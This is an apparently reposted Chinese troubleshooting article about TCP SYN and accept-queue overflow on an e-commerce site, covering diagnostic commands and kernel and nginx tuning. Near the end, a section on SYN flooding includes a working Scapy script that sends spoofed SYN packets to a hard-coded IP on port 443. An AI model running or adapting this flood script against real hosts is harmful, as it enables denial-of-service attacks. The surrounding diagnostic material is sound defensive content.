TCP半连接队列和全连接队列的可能和出现问题和解决方案-电子发烧友网

问题描述

监控系统发现电商网站主页及其它页面间歇性的无法访问；

查看安全防护和网络流量、应用系统负载均正常；

系统重启后，能够暂时解决，但持续一段时间后间歇性问题再次出现。

此时问题已影响到整个网站的正常业务，我那个心惊呀，最主要是报警系统没有任何报警，服务运行一切正常，瞬时背上的汗已经出来了。但还是要静心，来仔细寻找蛛丝马迹，来一步一步找问题。

问题初步判断

检查dev 和网卡设备层，是否有error和drop ，分析在硬件和系统层是否异常 ----- 命令 cat /proc/net/dev 和 ifconfig

观察socket overflow 和 socket droped（如果应用处理全连接队列（accept queue）过慢 socket overflow，影响半连接队列(syn queue)溢出socket dropped）-----命令 netstat -s |grep -i listen

TCP半连接队列和全连接队列的可能和出现问题和解决方案

发现SYN socket overflow 和 socket droped 急增加

检查sysctl内核参数：backlog ，somaxconn，file-max 和应用程序的backlog ；

ss -lnt查询，SEND-Q会取上述参数的最小值

发现当时队列已经超过网站80端口和443端口默认值

检查 selinux 和 NetworkManager 是否启用，建议禁用；

检查timestap ,reuse 启用，内核recycle是否启用，如果过NAT，禁用recycle；

抓包判断请求进来后应用处理的情况，是否收到SYN未响应情况。

深入分析问题

正常TCP建连接三次握手过程：

第一步：客户端发送 syn 到服务端发起握手；

第二步：服务端收到 syn后回复syn+ack给客户端；

第三步：客户端收到syn+ack后，回复服务端一个ack表示收到了服务端的syn+ack 。

从描述的情况来看，TCP建连接的时候全连接队列（accept队列）满了，尤其是描述中症状为了证明是这个原因。反复看了几次之后发现这个overflowed 一直在增加，那么可以明确的是server上全连接队列一定溢出了。

接着查看溢出后，OS怎么处理：

# cat /proc/sys/net/ipv4/tcp_abort_on_overflow0

tcp_abort_on_overflow 为0表示如果三次握手第三步的时候全连接队列满了那么server扔掉client 发过来的ack（在server端认为连接还没建立起来）

为了证明客户端应用代码的异常跟全连接队列满有关系，我先把tcp_abort_on_overflow修改成 1，1表示第三步的时候如果全连接队列满了，server发送一个reset包给client，表示废掉这个握手过程和这个连接（本来在server端这个连接就还没建立起来）。

接着测试然后在web服务日志中异常中可以看到很多connection reset by peer的错误，到此证明客户端错误是这个原因导致的。

查看sysctl内核参数：backlog ，somaxconn，file-max 和 nginx的backlog配置参数，ss -ln取最小值，发现为128，此时resv-q已经在129 ，请求被丢弃。将上述参数修改，并进行优化：

linux内核参进行优化：net.ipv4.tcp_syncookies = 1net.ipv4.tcp_max_syn_backlog = 16384net.core.somaxconn = 16384

nginx 配置参数优化：backlog=32768;

利用python 多线程压测，并未发现新的问题：

import requests from bs4 import BeautifulSoupfrom concurrent.futures import ThreadPoolExecutorurl='https://www.wuage.com/'response=requests.get(url)soup=BeautifulSoup(response.text,'html.parser')with ThreadPoolExecutor(20) as ex: for each_a_tag in soup.find_all('a'): try: ex.submit(requests.get,each_a_tag['href']) except Exception as err: print('return error msg:'+str(err))

理解TCP握手过程中建连接的流程和队列

TCP半连接队列和全连接队列的可能和出现问题和解决方案

如上图所示，这里有两个队列：syns queue(半连接队列）；accept queue（全连接队列）

三次握手中，在第一步server收到client的syn后，把相关信息放到半连接队列中，同时回复syn+ack给client（第二步）；

第三步的时候server收到client的ack，如果这时全连接队列没满，那么从半连接队列拿出相关信息放入到全连接队列中，否则按tcp_abort_on_overflow指示的执行。

这时如果全连接队列满了并且tcp_abort_on_overflow是0的话，server过一段时间再次发送syn+ack给client（也就是重新走握手的第二步），如果client超时等待比较短，就很容易异常了。

sYN Flood洪水攻击

当前最流行的DoS（拒绝服务攻击）与DDoS（分布式拒绝服务攻击）的方式之一，这是一种利用TCP协议缺陷，导致被攻击服务器保持大量SYN_RECV状态的“半连接”，并且会重试默认5次回应第二个握手包，塞满TCP等待连接队列，资源耗尽（CPU满负荷或内存不足），让正常的业务请求连接不进来。

from concurrent.futures import ThreadPoolExecutorfrom scapy.all import *def synFlood(tgt,dPort): srcList = ['11.1.1.2','22.1.1.102','33.1.1.2', '125.130.5.199'] for sPort in range(1024, 65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags='S') packet = ipLayer/tcpLayer send(packet)tgt = '139.196.251.198'print(tgt)dPort = 443with ThreadPoolExecutor(10000000) as ex: try: ex.submit(synFlood(tgt,dPort)) except Exception as err: print('return error msg:' + str(err))

所以大家要对TCP半连接队列和全连接队列的问题很容易被忽视，但是又很关键，特别是对于一些短连接应用更容易爆发。

出现问题后，从网络流量、cpu、线程、负载来看都比较正常，在用户端来看rt比较高，但是从服务器端的日志看rt又很短。如何避免在出现问题时手忙脚乱，建立起应急机机制，后续有机会写一下应急方面的文章。

声明：本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人，不代表电子发烧友网立场。文章及其配图仅供工程师学习之用，如有内容侵权或者其他违规问题，请联系本站处理。举报投诉

监控系统

监控系统

+关注

关注
21

文章
3918

浏览量
174963
TCP

TCP

+关注

关注
8

文章
1356

浏览量
79103
安全防护

安全防护

+关注

关注
0

文章
60

浏览量
13528

原文标题：记一次惊心的网站 TCP 队列问题排查经历

文章出处：【微信号：magedu-Linux，微信公众号：马哥Linux运维】欢迎添加关注！文章转载请注明出处。

FIFO队列原理简述

FIFO是队列机制中最简单的，每个接口上只有一个FIFO队列，表面上看FIFO队列并没有提供什么QoS保证，甚至很多人认为FIFO严格意义上不算做一种队列技术，实则不然，FIFO是其它

发表于 07-10 09:22 •1672次阅读

Linux TCP队列相关参数的总结

在Linux上做网络应用的性能优化时，一般都会对TCP相关的内核参数进行调节，特别是和缓冲、队列有关的参数。很多文章会告诉你需要修改哪些参数，但我们经常是知其然而不知其所以然，每次照抄过来后，可能很快就忘记或混淆了它们的含义。

发表于 10-30 10:12 •1031次阅读

Linux <b class='flag-5'>TCP</b><b class='flag-5'>队列</b>相关参数的总结

TCP队列引用问题

labview中如何将队列中的TCP网络连接读取出来，我知道是要用元素出队列这个函数，但是不知道在输出的元素端口后面接什么控件可以将队列中的

发表于 04-27 16:02

关于队列的问题

画着叉叉的线应该连接什么控件才能将队列里的TCP网络连接输出呢？

发表于 04-27 19:51

LabVIEW2018 TCP Server 利用队列连接多个客户端

TCP Server 端利用队列连接多个客户端

发表于 06-14 22:51

Agilent TCP和队列管理

TCP和队列管理

发表于 10-31 09:08

labview队列出现入队列或者出队列问题

最近在labview操作中出现了一个队列操作的问题，一入队列就出错，憋了好几天，今天终于解决了。首先，介绍一下我的程序。如图1，一个while循环加一个条件选择框，用main queue和Q3这两个

发表于 03-26 17:29

RTOS消息队列的多种用途

　　消息队列可以以多种不同的方式使用。事实上，您可以编写可能只使用消息队列的相当复杂的应用程序。仅使用消息队列可以减少代码的大小（即占用空间），因为可以模拟许多其他服务（信号量、时间延

发表于 06-29 14:57 •2565次阅读

没有accept，能建立TCP连接吗？

服务端代码，对socket执行bind方法可以绑定监听端口，然后执行listen方法后，就会进入监听（LISTEN）状态。内核会为每一个处于LISTEN状态的socket 分配两个队列，分别叫半连接

发表于 08-05 10:37 •828次阅读

SystemVerilog中的队列

队列是大小可变的有序集合，队列中元素必须是同一个类型的。队列支持对其所有元素的访问以及在队列的开始或结束处插入和删除。

发表于 10-31 10:09 •4053次阅读

什么是消息队列？消息队列中间件重要吗？

应用解耦：消息队列减少了服务之间的耦合性，不同的服务可以通过消息队列进行通信，而不用关心彼此的实现细节。

发表于 11-07 14:55 •1428次阅读

嵌入式环形队列和消息队列的实现

嵌入式环形队列和消息队列是实现数据缓存和通信的常见数据结构，广泛应用于嵌入式系统中的通信协议和领域。

发表于 04-14 11:52 •1566次阅读

RTOS消息队列的应用

基于RTOS的应用中，通常使用队列机制实现任务间的数据交互，一个应用程序可以有任意数量的消息队列，每个消息队列都有自己的用途。

发表于 05-29 10:49 •636次阅读

FreeRTOS消息队列介绍

队列是为了任务与任务、任务与中断之间的通信而准备的，可以在任务与任务、任务与中断之间传递消息，队列中可以存储有限的、大小固定的数据项目。任务与任务、任务与中断之间要交流的数据保存在队列中，叫做

发表于 07-06 16:58 •814次阅读

嵌入式环形队列与消息队列的实现原理

嵌入式环形队列，也称为环形缓冲区或循环队列，是一种先进先出（FIFO）的数据结构，用于在固定大小的存储区域中高效地存储和访问数据。其主要特点包括固定大小的数组和两个指针（头指针和尾指针），分别指向队列的起始位置和结束位置。

发表于 09-02 15:29 •535次阅读

搜索历史

TCP半连接队列和全连接队列的可能和出现问题和解决方案

评论

FIFO队列原理简述

Linux TCP队列相关参数的总结

TCP队列引用问题

关于队列的问题

LabVIEW2018 TCP Server 利用队列连接多个客户端

Agilent TCP和队列管理

labview队列出现入队列或者出队列问题

RTOS消息队列的多种用途

没有accept，能建立TCP连接吗？

SystemVerilog中的队列

什么是消息队列？消息队列中间件重要吗？

嵌入式环形队列和消息队列的实现

RTOS消息队列的应用

FreeRTOS消息队列介绍

嵌入式环形队列与消息队列的实现原理